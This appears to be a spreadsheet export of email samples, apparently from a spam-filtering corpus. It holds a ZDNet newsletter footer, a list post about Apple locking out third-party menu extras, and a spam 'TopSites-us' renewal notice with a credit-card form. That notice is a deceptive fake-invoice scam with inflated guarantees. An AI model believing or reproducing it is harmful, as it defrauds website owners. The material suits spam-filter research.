 &lt;img src="http://www.zdnet.com/b.gif" width=1 height=10&gt;&lt;br&gt;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href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=zdnet'&gt;free newsletters&lt;/a&gt; from ZDNet&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width="1" height="5"&gt;&lt;br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@spamassassin.taint.org&lt;/font&gt;&lt;/font&gt;
       &lt;p&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt; 
         &lt;a NOTRACK href='http://clickthru.online.com/Click?q=49-ZMeczjprfiQ3nz5mcyZDcZEanJRCYsRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=zdnet'&gt;Manage 
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=5e-ssGdIn0656szMrehsnStcVTQzc9R" &gt;FAQ&lt;/A&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=73-__ZeIBBtE5cttyGT8UEE0WNrUZcR"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href="http://clickthru.online.com/Click?q=88-ec5PQQKxb5ofGTz-rU358atSBbiR" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://clickthru.online.com/Click?q=9e-tWQoQtMQnKR5PgGHSCN0U7nQUD4R" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://clickthru.online.com/Click?q=b3-QHzxQYKTCrVd7ieAE64qDAwrPGrR" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=c8-2lPnQWOzzbv36i-MKE-nFr99H2iR" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=dd-tpm0QzWdTbVg_78GZP85eXsJh-PR" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=f2-OZVTQUwWqr33g_S0pvVdi5Z7ednR" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=07-HqCzI5rqvUtgu8OiqzUbrvLkiDeR" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=1c-cs_iIFr4T83lOP5n9kgGa2oXqGyR" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=31-V_YRIjMsVa7BqadyLxjkqVAXXblR"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src="http://gserv.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e501-01&amp;ISSUE=2002-07-16" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=47-ADxxn5Zo2oHFTNbx6YbHl3KeK9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Apple Sauced...again
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Over on Arstechnica (www.arstechnica.com) I saw mention of a Wired article
 that goes into the many wonderfull ways Apple is showing its love and
 respect for its users.
 http://www.wired.com/news/mac/0,2125,55395,00.html
 There is a good rundown of all the whys and whatfores over at
 http://arstechnica.com/reviews/02q3/macosx-10.2/macosx-10.2-5.html
 "True to form, industrious third party developers saw that they could gain
 a competitive advantage by supporting this more capable user interface in
 their applications. Apple's private menu extras APIs were reverse
 engineered and leveraged to great effect. The architecture was so popular
 that an application for managing predefined sets of menu extras (third
 party or otherwise) was in development.
 All of that changed with the release of Jaguar--but not because the
 private APIs had changed. If they had, third party developers would have
 updated their applications to work with the new APIs, as they have
 resigned themselves to doing by choosing to use private APIs in the first
 place.
 But what actually happened in Jaguar was that Apple added code to forcibly
 exclude all non-Apple menu extras. Other parts of the API did not change.
 But when a menu extra is loaded, it is compared to a hard-coded list of
 "known" menu extras from Apple. If the menu extra is not on that list, it
 is not allowed to load.
 It's easy to laugh at Steve Ballmer's sweat-soaked gyrations as he chants
 "developers, developers, developers!", but Microsoft clearly understands
 something that Apple is still struggling with. It is in a platform
 vendor's best interest to encourage development for its platform. In
 Apple's case, this doesn't mean that they have to bend over backwards to
 make every single system service and UI element "pluggable" via public
 APIs. That's clearly a lot of work, and not something that needs to be the
 number one priority for an OS in its infancy. And in the meantime, if
 third party developers want to sell into a market that requires the
 desired functionality to be added in "unsupported" ways, then they must be
 prepared for the maintenance consequences of their decisions.
 But for Apple to go out of its way--to actually expend developer
 effort--to stop these third party developers, while still failing to
 provide a supported alternative, is incredibly foolish. "
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Sitescooper: scoop websites onto your PalmPilot - Sitescooper
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_000B_01C238C5.A7241DF0
 Content-Type: text/plain;
 	charset="us-ascii"
 Content-Transfer-Encoding: 8bit
 Could you please be so kind as to renew your TopSites-us directory listing by Thursday, December 5 so we can continue to show it to our millions of users? For information on renewing please go to: 
 http://topsitez.us/renew-tab.htm?id=713164&amp;d=jmason.org
 If you cannot access our site, just let me know you want to renew by email. Your listing only cost $5 a month.
 If you have a questions, please go to:
 http://topsitez.us/faq/index.htm?id=713164&amp;d=jmason.org&amp;op=cat&amp;c=1
 If you cannot find your answer there, please let me know. I will be happy to help in any way I can. If you do not want to renew, there is no need to write; we will cancel your listing automatically. 
 Kind Regards,
 Paul Thomas
 To remove your address from our mailing list you can go to: 
 http://topsitez.us/cancel.htm?id=713164&amp;d=jmason.org
 YOUR LISTING
 Sitescooper: scoop websites onto your PalmPilot
 Sitescooper automatically retrieves the stories from several news websites, trims    off extraneous HTML, and converts them into iSilo or Palm DOC format for later    reading on-the-move. It maintains a cache, and will avoid stories you've already    read. It can handle 1-page sites, 1-page with diffing, 2- and 3-level sites as well    as My-Netscape-style RSS sites. It's also very easy to add a new site to its list.    Even if you don't have a PalmPilot, it's still handy for simple website-to-text    conversion. Site files are included for many popular news sites including Slashdot,    LWN, Freshmeat and Linux Today.
 http://jmason.org/software/sitescooper/
 Your category: http://topsitez.us/category-tab.htm?id=713164&amp;d=spamassassin.taint.org
 REACH A MILLION
 Here is what you get:
 1. We will continue to list your site in the TopSites directories.
 2. We will show your listing more than a million times a year (guaranteed).
 Let us introduce you (a million times!)
 People often ask, "How can you guarantee to show my listing a million times? What if I am in an unpopular category?" It does not matter! Why? AutoSearch--our patent pending tool--continually displays renewed TopSites-us listings on our users PCs 24 hours a day, seven days a week. We display TopSites-us listings more than 42 million times in an hour. That is why we can guarantee to show your listing more than a million times a year. 
 Save $40,000 in adverting 
 It would cost you up to $40,000 to display your listing a million times at sites like MSN and Altavista. Googles charges up to $200,000 depending on your category. At TopSites we charge $5 a month!
 Save $100 re-listing fee
 Please do not let your listing expire. Our editors listed you as one of the top websites in your category without charge. If your listing expires, however, you may need to pay a $100 editorial review fee to get listed again. It can take a month for our editors to authorize a listing. And they may not re-list you if there are too many listings in your category. 
 Only TopSites-us gives you: 
 * Massive Reach: We display our listings billions of times a year. We guarantee to show your listing more than a million times a year.
 * Cost-Effectiveness: This is the least expensive advertising you will ever buy. You want to bring lots of potential customers to your site in a cost-effective way. TopSites-us does exactly that! 
 * Highly Targeted Leads: TopSites-us reaches customers when they are searching for what you are selling. That means high sales and low costs. More visitors become customers! 
 * Highest Return on Investment: Independent research confirms that you get the highest ROI from online listings like TopSites-us. E-mail, banners and other forms of online advertising all have a lower ROI. And unlike direct mail, you pay nothing for mailing lists, printing or postage. No media buy returns better results than TopSites-us. 
 * No-Risk: Cancel your listing any time for any reason--no questions asked!
 * Hassle-Free: Change your listing anytime or even move it to a different category--for free--and your changes will instantly appear in the directory
 "TopSites-us is the least expensive way I have found to bring buyers to my site. I have tried other online advertising companies and you beat everyone!" 
 --P.A., President, Go Software (g-o.us) 
 "TopSites-us makes my online marketing easy. I can change my message 24 hours a day so it is always up-to-date. And everyone who sees it is a pre-qualified prospect." 
 --N.B., CEO, My News (my-news.org)
 FREQUENTLY ASKED QUESTIONS
 Can I change my listing?
 You can change your listing now or later. You can rewrite the headline and description before renewing. You can change the URL tooeven to another website. 
 Once we receive payment, we will send you instructions on how to change your listing whenever you like. (Theres no charge to do this.)
 Can I change my category? 
 Can I list my site in additional categories?
 Can I list other sites too?
 You can list as many sites in as many categories as you like. Each listing costs only $5 per month per category. Just go to www.topsitez.us. Click on the category links until you find the one you want (or search on your keywords). Click on the Add My Site link. Then type your listing. If your old listing was in the wrong category, you can click unsubscribe to cancel it.
 How much does a listing cost?
 Can I renew for free?
 It costs $5 a month to list your site in TopSites. We no longer offer any free listings. We will bill you $60 for 12 months. There are no additional costs. You can change your listing as often as you like for free. You can cancel your listing anytime and we will refund your remaining money.
 How do I pay? 
 You can pay with a U.S. check, money order or bank draft. Or you can pay by Visa, MasterCard or American Express. Simply select the option you prefer on the renewal form. (Unfortunately, we cannot cash overseas checks at this time.)
 Who listed us?
 When did our listing start?
 We do not know. Sorry. We only began to track listing contacts and dates this year.
 How much did we pay to be listed? 
 Originally you couldnt buy a listing--you had to wait for our editors to select you as one of the top sites in your category.
 Do we have a contract with you?
 We dont ask our customers to sign contracts for a $5 a month service.
 Can you call me and tell me more?
 We are happy to answer all your questions by email but we dont contact our customer by phone at this time. Sorry.
 Can I still renew after your deadline?
 We give our customers a month to renew so dont worry too much about the deadline.
 How do I see my listing? I couldnt find it when I searched.
 You can go to www.topsitez.us and click on the categories until you get to /Top/Computers/Software/Operating_Systems/Linux/Projects/Internet.
 You can also see it at www.topsitez.us by entering two or more keywords from your listing into our search form. Since we have more than three million listings, you probably wont find your listing by searching on only one word. And you definitely wont find it if you search on words that are not in your listing. 
 What keywords display my listing? 
 How do I change them?
 Every word in your listing is a keyword. Anytime someone searches on two or more words in your listing, we will display it. The only way to change your keywords is to change the headline or description of your listing.
 How much traffic did you send us last year?
 We dont know. Sorry. We are working on adding this feature.
 ..for more answers go to:
 http://topsitez.us/faq/index.htm?id=713164&amp;d=jmason.org&amp;op=cat&amp;c=1
 ------=_NextPart_000_000B_01C238C5.A7241DF0
 Content-Type: text/html;
 	charset="us-ascii"
 Content-Transfer-Encoding: 8bit
 &lt;html&gt;&lt;head&gt;&lt;title&gt;Renew&lt;/title&gt;&lt;/head&gt;&lt;body&gt;
 &lt;b&gt;&lt;font face="ARIAL" color="#000066"&gt;TOPSITES LLC&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font color="#000066"&gt;1300 Evans Avenue, San Francisco, CA 94120-7334 USA - Phone 415-294-5300&lt;/font&gt;
   &lt;p&gt;Could you please be so kind as to click on the Renew button to renew &lt;a href="http://topsitez.us/category-tab.htm?id=713164&amp;d=jmason.org"&gt;your 
     listing&lt;/a&gt; in the &lt;a href="http://topsitez.us/home-tab.htm?id=713164&amp;d=jmason.org"&gt;TopSites-us&lt;/a&gt; 
     directory listing by Thursday, December 5, if you do not mind? You can also renew your listing 
     on our website by clicking &lt;a href="http://topsitez.us/renew-tab.htm?id=713164&amp;d=jmason.org"&gt; 
     renew&lt;/a&gt;. If you cannot access the Internet, let me know and I will renew 
     your listing for you. Your listing only cost US $5 (&lt;a href="http://topsitez.us/currency.htm"&gt;other currencies&lt;/a&gt;) per month per category.&lt;/p&gt;
   &lt;p&gt;If you have any questions, please click &lt;a href="http://topsitez.us/faq/index.htm?id=713164&amp;d=jmason.org&amp;op=cat&amp;c=1"&gt;FAQs&lt;/a&gt;. 
     If you cannot find your answer there, please let me know. I will be happy 
     to help in any way I can.&lt;/p&gt;
 &lt;p&gt;Kind Regards,&lt;br&gt;
   &lt;br&gt;
   Paul Thomas&lt;/p&gt;
   &lt;p align="center"&gt;To remove your address from our mailing list or to cancel your 
     listing simply click &lt;a href="http://topsitez.us/cancel.htm?id=713164&amp;d=jmason.org"&gt;unsubscribe&lt;/a&gt;.&lt;/p&gt;
   &lt;form action="http://topsitez.us/renew-invoice.htm" method="get"&gt;
   &lt;TABLE CELLSPACING="0" CELLPADDING="0" BORDER="0" WIDTH="100%" height="42"&gt;
   &lt;TR BGcolor="#CCCC99"&gt;
 	&lt;TD ALIGN="LEFT" VALIGN="TOP" WIDTH="12" NOWRAP height="19"&gt;&amp;nbsp;&lt;BR&gt;&lt;/TD&gt;
 	&lt;TD ALIGN="LEFT" VALIGN="TOP" HEIGHT="19" WIDTH="*"&gt;&lt;b&gt;
     &lt;font face="ARIAL" size="2" color="#000066"&gt;RENEW YOUR LISTING&lt;/font&gt;&lt;/b&gt;&lt;/TD&gt;
 	&lt;TD ALIGN="LEFT" VALIGN="TOP" WIDTH="12" NOWRAP height="19"&gt;&amp;nbsp;&lt;BR&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR BGcolor="#EEEED0"&gt;
 	&lt;TD ALIGN="LEFT" VALIGN="TOP" COLSPAN="3" BGcolor="#C0C0C0" height="3" width="100%"&gt;
     &lt;IMG SRC="http://topsitez.us/table_shaded_header_shadow.gif" WIDTH="100%" HEIGHT="3" BORDER="0"&gt;&lt;BR&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR BGcolor="#EEEED0"&gt;
 	&lt;TD ALIGN="LEFT" VALIGN="TOP" WIDTH="12" NOWRAP height="19"&gt;&amp;nbsp;&lt;BR&gt;&lt;/TD&gt;
 	&lt;TD ALIGN="LEFT" VALIGN="TOP" WIDTH="*" height="19"&gt;
   &lt;table width="100%" border=1 cellspacing=0 cellpadding=0 height="9" style="border-left-style: none; border-right-style: none; border-top-style: none; border-bottom: none"&gt;
             &lt;tr&gt; 
               &lt;td height="14" style="font-weight: bold; color: black; border-style: none;"  width="84" align="right" VALIGN="TOP"&gt; 
                 &lt;div align="left"&gt;&lt;span style="font-weight: 400"&gt; Category:&lt;/span&gt;&lt;/div&gt;&lt;/TD&gt;
               &lt;td height="14" style="color: black; border-style: none" colspan="2" width="*" VALIGN="TOP"&gt; 
                 List our site in the following categories:&lt;br&gt;&lt;input type="checkbox" name="category" value="/Top/Computers/Software/Operating_Systems/Linux/Projects/Internet" checked&gt;&lt;a href="http://topsitez.us/cgi.htm?cat=/Top/Computers/Software/Operating_Systems/Linux/Projects/Internet"&gt;/Top/Computers/Software/Operating_Systems/Linux/Projects/Internet&lt;/a&gt;&lt;br&gt;&lt;input type="checkbox" name="category" value="/Top/Computers/Software/Operating_Systems/Linux/Projects/Internet/Web"&gt;&lt;a href="http://topsitez.us/cgi.htm?cat=/Top/Computers/Software/Operating_Systems/Linux/Projects/Internet/Web"&gt;/Top/Computers/Software/Operating_Systems/Linux/Projects/Internet/Web&lt;/a&gt;&lt;br&gt;&lt;input type="checkbox" name="category" value="/Top/Computers/Software/Operating_Systems/Linux/Projects/Internet/Email"&gt;&lt;a href="http://topsitez.us/cgi.htm?cat=/Top/Computers/Software/Operating_Systems/Linux/Projects/Internet/Email"&gt;/Top/Computers/Software/Operating_Systems/Linux/Projects/Internet/Email&lt;/a&gt;&lt;br&gt;&lt;/TD&gt;
             &lt;/tr&gt;
             &lt;tr&gt; 
               &lt;td height="28" style="font-weight: bold; color: black; border-style: none;" width="84" align="right" VALIGN="TOP"&gt; 
                 &lt;div align="left"&gt;&lt;span style="font-weight: 400"&gt;
                   Headline:&lt;/span&gt;&lt;/div&gt;&lt;/TD&gt;
               &lt;td height="28" style="color: black; border-style: none" VALIGN="TOP" width="374"&gt; 
                 &lt;input type="text" name="site" value="Sitescooper: scoop websites onto your PalmPilot" size="50" maxlength="50"&gt;
                 &lt;/TD&gt;
               &lt;td height="93" style="color: black; width=; border-left-style:none; border-right-style:none; border-top-style:none; " width="*" rowspan="7" VALIGN="TOP" bordercolor="#CCCC99"&gt; 
                 &lt;ul type="circle"&gt;
                   &lt;li&gt;&lt;font color="#FF0000"&gt;&lt;i&gt;Cost:&lt;/i&gt; Your 
                     listing costs US $5 (&lt;a href="http://topsitez.us/currency.htm"&gt;other currencies&lt;/a&gt;) per month per category (billed annually).&lt;/font&gt;&lt;/li&gt;
                   &lt;li&gt;&lt;i&gt;Refunds&lt;/i&gt;: Cancel anytime. We will refund the remaining 
                     months.&lt;/li&gt;
                   &lt;li&gt;&lt;i&gt;Changes:&lt;/i&gt; You can change your headline, description 
                     (up to 40 words) or URL.&lt;/li&gt;
                   &lt;li&gt;&lt;i&gt;Category: &lt;/i&gt;Select the categories you want by clicking 
                     the checkboxes. If you want us to list you in a categories 
                     that is not on the list, go to &lt;a href="http://www.topsitez.us"&gt;www.topsitez.us&lt;/a&gt;. 
                     Click on the category links until you find the one you want. 
                     Click on the Add My Site link. Type your listing.&lt;/li&gt;
                   &lt;li&gt;&lt;i&gt;Cancel&lt;/i&gt;: To cancel your listing click &lt;a href="http://topsitez.us/cancel.htm?id=713164&amp;d=spamassassin.taint.org"&gt;unsubscribe&lt;/a&gt;.&lt;/li&gt;
                   &lt;li&gt;&lt;i&gt;To pay by check&lt;/i&gt;: We will 
                     email an invoice to you. You can pay with a local check from any country.&lt;/li&gt;
                   &lt;li&gt;&lt;i&gt;To pay by credit card&lt;/i&gt;. Click the credit card option 
                     and enter your number. We accept Visa, MasterCard and American 
                     Express.&lt;/li&gt;
                   &lt;li&gt;&lt;i&gt;Problems&lt;/i&gt;?: Try renewing on our website by clicking 
                     &lt;a href="http://topsitez.us/renew-tab.htm?id=713164&amp;d=jmason.org"&gt; 
                     renew&lt;/a&gt;. Or just let us know by email that you want to renew. 
                   &lt;/li&gt;
                 &lt;/ul&gt;&lt;/TD&gt;
             &lt;/tr&gt;
             &lt;tr&gt; 
               &lt;td height="34" style="font-weight: bold; color: black; border-style: none" width="84" align="right" VALIGN="TOP"&gt; 
                 &lt;div align="left"&gt;&lt;span style="font-weight: 400"&gt; 
                   Description:&lt;/span&gt;&lt;/div&gt;&lt;/TD&gt;
               &lt;td height="34" style="color: black; border-style: none" VALIGN="TOP" width="374"&gt; 
                 &lt;textarea name="description" cols="40" rows=3 wrap=ON&gt;Sitescooper automatically retrieves the stories from several news websites, trims    off extraneous HTML, and converts them into iSilo or Palm DOC format for later    reading on-the-move. It maintains a cache, and will avoid stories you've already    read. It can handle 1-page sites, 1-page with diffing, 2- and 3-level sites as well    as My-Netscape-style RSS sites. It's also very easy to add a new site to its list.    Even if you don't have a PalmPilot, it's still handy for simple website-to-text    conversion. Site files are included for many popular news sites including Slashdot,    LWN, Freshmeat and Linux Today.&lt;/textarea&gt;
                 &lt;/TD&gt;
             &lt;/tr&gt;
             &lt;tr&gt; 
               &lt;td height="29" style="font-weight: bold; color: black; border-left-style:none; border-right-style:none; border-top-style:none; border-bottom-color:#808000; border-bottom-style:solid" width="84" align="right" VALIGN="TOP"&gt; 
                 &lt;div align="left"&gt;&lt;span style="font-weight: 400"&gt; &lt;/span&gt;&lt;span style="font-weight: 400"&gt;URL:&lt;/span&gt;&lt;/div&gt;&lt;/TD&gt;
               &lt;td height="29" style="color: black; border-left-style:none; border-right-style:none; border-top-style:none; border-bottom-color:#808000; border-bottom-style:none" VALIGN="TOP" width="374"&gt; 
                 &lt;input type="text" name="urls" value="http://jmason.org/software/sitescooper/" size="50"&gt;
                 &lt;/TD&gt;
             &lt;/tr&gt;
             &lt;tr&gt; 
               &lt;td height="1" width="84" style="font-weight: bold; color: black; border-style: none" VALIGN="TOP"&gt;
       &lt;div align="left"&gt;&lt;span style="font-weight: 400"&gt;Your 
                   name:&lt;/span&gt;&lt;/div&gt;&lt;/TD&gt;
               &lt;td height="1" width="374" style="color: black; border-style: none" VALIGN="TOP"&gt; 
                 &lt;input type=text size="50" name=Name maxlength=60&gt;
               &lt;/TD&gt;
             &lt;/tr&gt;
             &lt;tr&gt; 
               &lt;td height="1" width="84" style="font-weight: bold; color: black; border-style: none" VALIGN="TOP"&gt;
       &lt;div align="left"&gt;&lt;span style="font-weight: 400"&gt;Your 
                   email:&lt;/span&gt;&lt;/div&gt;&lt;/TD&gt;
               &lt;td height="1" width="374" style="color: black; border-style: none" VALIGN="TOP"&gt; 
                 &lt;input type=text size="50" name=email value="@jmason.org"&gt;
                 &lt;/TD&gt;
             &lt;/tr&gt;
             &lt;tr&gt; 
               &lt;td height="0" style="font-weight: bold; color: black; border-left-style:none; border-right-style:none; border-top-style:none" width="84" align="right" VALIGN="TOP" bordercolor="#EEEED0"&gt; 
                 &lt;div align="left"&gt;&lt;span style="font-weight: 400"&gt; 
                   Pay 
                   by:&lt;/span&gt;&lt;/div&gt;&lt;/TD&gt;
               &lt;td height="0" style="color: black; border-left-style:none; border-right-style:none; border-top-style:none" width="374" bordercolor="#EEEED0" VALIGN="TOP"&gt; 
                 &lt;input type="radio" value="in" name="paidby" checked&gt;
                 Check (invoice me)&lt;br&gt; &lt;input type="radio" value="cc" name="paidby"&gt; 
                 Credit card  &lt;table border="0" cellpadding="0" cellspacing="0" width="100%" height="49"&gt;
                   &lt;tr&gt; 
                     &lt;td width="11%" height="5"&gt;&lt;/td&gt;
                     &lt;td width="31%" height="5"&gt;Card 
                       number:&lt;/td&gt;
                     &lt;td width="58%" height="5"&gt; 
                       &lt;input type=text size="24" name=cc&gt;
                       &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt; 
                     &lt;td width="11%" height="21"&gt;&amp;nbsp;&lt;/td&gt;
                     &lt;td width="31%" height="21"&gt;Expiry 
                       date:&lt;/td&gt;
                     &lt;td width="58%" height="21"&gt; 
                       &lt;select size="1" name="ccmonth"&gt;
                         &lt;option selected value="01"&gt;January&lt;/option&gt;
                         &lt;option value="02"&gt;February&lt;/option&gt;
                         &lt;option value="03"&gt;March&lt;/option&gt;
                         &lt;option value="04"&gt;April&lt;/option&gt;
                         &lt;option value="05"&gt;May&lt;/option&gt;
                         &lt;option value="06"&gt;June&lt;/option&gt;
                         &lt;option value="07"&gt;July&lt;/option&gt;
                         &lt;option value="08"&gt;August&lt;/option&gt;
                         &lt;option value="09"&gt;September&lt;/option&gt;
                         &lt;option value="10"&gt;October&lt;/option&gt;
                         &lt;option value="11"&gt;November&lt;/option&gt;
                         &lt;option value="12"&gt;December&lt;/option&gt;
                       &lt;/select&gt;
                       &lt;select size="1" name="ccyear"&gt;
                         &lt;option value="02" selected&gt;2002&lt;/option&gt;
                         &lt;option value="03"&gt;2003&lt;/option&gt;
                         &lt;option value="04"&gt;2004&lt;/option&gt;
                         &lt;option value="05"&gt;2005&lt;/option&gt;
                         &lt;option value="06"&gt;2006&lt;/option&gt;
                       &lt;/select&gt;
                       &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt; 
                     &lt;td width="11%" height="23"&gt;&amp;nbsp;&lt;/td&gt;
                     &lt;td width="31%" height="23"&gt;Zip/postal 
                       code:&lt;/td&gt;
                     &lt;td width="58%" height="23"&gt; 
                       &lt;input type=text size="14" name=cczip&gt;
                       &lt;/td&gt;
                   &lt;/tr&gt;
                 &lt;/table&gt;&lt;/TD&gt;
             &lt;/tr&gt;
             &lt;tr&gt; 
               &lt;td height="1" style="font-weight: bold; color: black; border-style: none"  width="84"&gt;&amp;nbsp; 
                 &lt;/TD&gt;
               &lt;td height="1" style="color: black; border-style: none"  width="374"&gt;
     &lt;input type="hidden" name="uid" value="713164"&gt;
 	&lt;input type="hidden" name="did" value="519459"&gt;
 	&lt;input type="hidden" name="cost" value="5"&gt;
 	&lt;input type="hidden" name="domains" value="jmason.org"&gt;
                 &lt;input type=submit value="Renew" style="font-family: Arial; font-size: 10pt; font-weight: bold"&gt;
               &lt;/TD&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
     &lt;/TD&gt;
 	&lt;TD ALIGN="LEFT" VALIGN="TOP" WIDTH="12" NOWRAP height="19"&gt;&amp;nbsp;&lt;BR&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
   &lt;/TABLE&gt;&lt;/form&gt;
   &lt;TABLE CELLSPACING="0" CELLPADDING="0" BORDER="0" WIDTH="100%" height="42"&gt;
   &lt;TR BGcolor="#CCCC99"&gt;
 	&lt;TD ALIGN="LEFT" VALIGN="TOP" WIDTH="12" height="19" NOWRAP&gt;&amp;nbsp;&lt;BR&gt;&lt;/TD&gt;
 	  &lt;TD ALIGN="LEFT" VALIGN="MIDDLE" HEIGHT="19" WIDTH="100%" NOWRAP&gt;&lt;b&gt;&lt;font face="ARIAL" color="#000066" size="2"&gt; 
         REACH A MILLION&lt;/font&gt;&lt;/b&gt;&lt;/TD&gt;
 	&lt;TD ALIGN="LEFT" VALIGN="TOP" WIDTH="12" NOWRAP height="19"&gt;&amp;nbsp;&lt;BR&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR BGcolor="#EEEED0"&gt;
 	&lt;TD ALIGN="LEFT" VALIGN="TOP" COLSPAN="3" BGcolor="#C0C0C0" height="3"&gt;
     &lt;IMG SRC="http://topsitez.us/table_shaded_header_shadow.gif" WIDTH="100%" HEIGHT="3" BORDER="0"&gt;&lt;BR&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR BGcolor="#EEEED0"&gt;
 	&lt;TD ALIGN="LEFT" VALIGN="TOP" WIDTH="12" NOWRAP height="19"&gt;&amp;nbsp;&lt;BR&gt;&lt;/TD&gt;
 	&lt;TD ALIGN="LEFT" VALIGN="TOP" WIDTH="100%" height="19"&gt;
 	&lt;b&gt;Here is what you get:&lt;/b&gt;
         &lt;ol&gt;
           &lt;li&gt;We will continue to list your site in the TopSites directory.&lt;/li&gt;
           &lt;li&gt;We will show your listing more than a million times a year (guaranteed).&lt;/li&gt;
         &lt;/ol&gt;
      &lt;p&gt;
 &lt;b&gt;Let us introduce you (a million times)&lt;/b&gt;&lt;br&gt;&lt;br&gt;
 People often ask, &amp;quot;How can you guarantee to show my listing a million times? 
 What if I am in an unpopular category?&amp;quot; It does not matter! Why?
   AutoSearch--our patent pending tool--continually displays
   renewed TopSites-us  
 listings on 
 our users PCs 24 hours a day, seven days a week. We display TopSites-us listings 
 more than 42 million 
   times in an hour. That is why we can guarantee to show your listing more than a million 
   times a year. &lt;/p&gt;
         &lt;p&gt; &lt;b&gt;Save $40,000 in adverting&lt;/b&gt; &lt;br&gt;
           &lt;br&gt;
           It would cost you up to $40,000 to display your listing a million times 
           at sites like MSN and Altavista. Googles charges up to $200,000 depending 
           on your category. At TopSites we charge $5 a month!&lt;br&gt;
           &lt;br&gt;
           &lt;b&gt;Save $100 re-listing fee&lt;/b&gt;&lt;br&gt;
           &lt;br&gt;
           Please do not let your listing expire. Our editors listed you as one 
           of the top websites in your category without charge. If your listing 
           expires, however, you may need to pay a $100 editorial review fee to 
           get listed again. It can take a month for our editors to authorize a 
           listing. And they may not re-list you if there are too many listings 
           in your category. &lt;/p&gt;
      &lt;p&gt;&lt;b&gt;Only TopSites-us 
   gives you: &lt;/b&gt; &lt;/p&gt;
 &lt;ul type="circle"&gt;
   &lt;li&gt;&lt;i&gt;Massive Reach:&lt;/i&gt; We display our listings billions of times a year. 
     We guarantee to show &lt;i&gt;your&lt;/i&gt; listing more than a million times a year.&lt;/li&gt;
   &lt;li&gt;&lt;i&gt;Cost-Effectiveness:&lt;/i&gt; This is the least expensive  advertising 
     you will ever buy. You want to bring lots of potential customers 
     to your site in a cost-effective way. TopSites-us does exactly that! &lt;/li&gt;
   &lt;li&gt;&lt;i&gt;Highly Targeted Leads:&lt;/i&gt; TopSites-us reaches customers when they are 
     searching for what you are selling. That means high sales and low costs. More 
     visitors become customers! &lt;/li&gt;
   &lt;li&gt;&lt;i&gt;Highest Return on Investment:&lt;/i&gt;&lt;b&gt; &lt;/b&gt;Independent research confirms 
     that you get the highest ROI from online listings like TopSites-us. E-mail, 
     banners and other forms of online advertising all have a lower ROI. And unlike 
     direct mail, you pay nothing for mailing lists, printing or postage. No media 
     buy returns better results than TopSites-us. &lt;/li&gt;
   &lt;li&gt;&lt;i&gt;No-Risk:&lt;/i&gt;&lt;b&gt; &lt;/b&gt;Cancel your listing any time for any reason--no questions 
     asked!&lt;/li&gt;
   &lt;li&gt;&lt;i&gt;Hassle-Free:&lt;/i&gt; Change your listing anytime or even move it 
     to a different category--for free--and your changes will instantly appear 
     in the directory&lt;/li&gt;
 &lt;/ul&gt; 
      &lt;/TD&gt;
 	&lt;TD ALIGN="LEFT" VALIGN="TOP" WIDTH="12" NOWRAP height="19"&gt;&amp;nbsp;&lt;BR&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR BGcolor="#CCCC99"&gt;
   &lt;/TABLE&gt;
   &lt;br&gt;
   &lt;TABLE CELLSPACING="0" CELLPADDING="0" BORDER="0" WIDTH="100%"&gt;
 	&lt;TR BGcolor="#EEEED0"&gt;
